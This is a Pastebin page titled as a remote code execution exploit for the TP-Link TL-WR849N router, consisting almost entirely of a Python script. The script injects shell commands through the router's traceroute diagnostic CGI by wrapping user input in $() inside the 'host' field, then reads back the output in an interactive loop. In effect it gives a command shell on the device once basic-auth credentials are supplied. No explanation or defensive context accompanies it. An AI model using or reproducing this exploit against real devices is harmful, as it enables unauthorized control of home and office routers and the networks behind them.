Advertisement
AbdulMuttaqin

TP LINK TL-WR849N - Remote Code Execution

Mar 9th, 2020
594
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.72 KB | None | 0 0
  1. import requests
  2.  
  3. def output(headers,cookies):
  4.     url = 'http://192.168.0.1/cgi?1'
  5.     data = ''
  6.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,3\x0d\x0a'
  7.     data += 'diagnosticsState\x0d\x0a'
  8.     data += 'X_TP_HopSeq\x0d\x0a'
  9.     data += 'X_TP_Result\x0d\x0a'
  10.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
  11.     saida = r.text
  12.     filtro = saida.replace(': Name or service not known','')
  13.     filtro = filtro.replace('[0,0,0,0,0,0]0','')
  14.     filtro = filtro.replace('diagnosticsState=','')
  15.     filtro = filtro.replace('X_TP_HopSeq=0','')
  16.     filtro = filtro.replace('X_TP_Result=','')
  17.     print(filtro[:-8])
  18.  
  19. def aceppt(headers,cookies):
  20.     url = 'http://192.168.0.1/cgi?7'
  21.     data = '[ACT_OP_TRACERT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a'
  22.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
  23.     output(headers,cookies)
  24.  
  25.  
  26. def inject(command,headers,cookies):
  27.     url = 'http://192.168.0.1/cgi?2'
  28.     data = ''
  29.     data += '[TRACEROUTE_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,8\x0d\x0a'
  30.     data += 'maxHopCount=20\x0d\x0a'
  31.     data += 'timeout=5\x0d\x0a'
  32.     data += 'numberOfTries=1\x0d\x0a'
  33.     data += 'host=\"$('+command+')\"\x0d\x0a'
  34.     data += 'dataBlockSize=64\x0d\x0a'
  35.     data += 'X_TP_ConnName=ewan_pppoe\x0d\x0a'
  36.     data += 'diagnosticsState=Requested\x0d\x0a'
  37.     data += 'X_TP_HopSeq=0\x0d\x0a'
  38.     r = requests.post(url,data=data,headers=headers,cookies=cookies)
  39.     aceppt(headers,cookies)
  40.  
  41.  
  42.  
  43. def main():
  44.     cookies = {"Authorization": "Basic REPLACEBASE64AUTH"}
  45.     headers = {'Content-Type': 'text/plain',
  46.       'Referer': 'http://192.168.0.1/mainFrame.htm'}
  47.     while True:
  48.         command = input('$ ')
  49.         inject(command,headers,cookies)
  50.  
  51.  
  52. main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement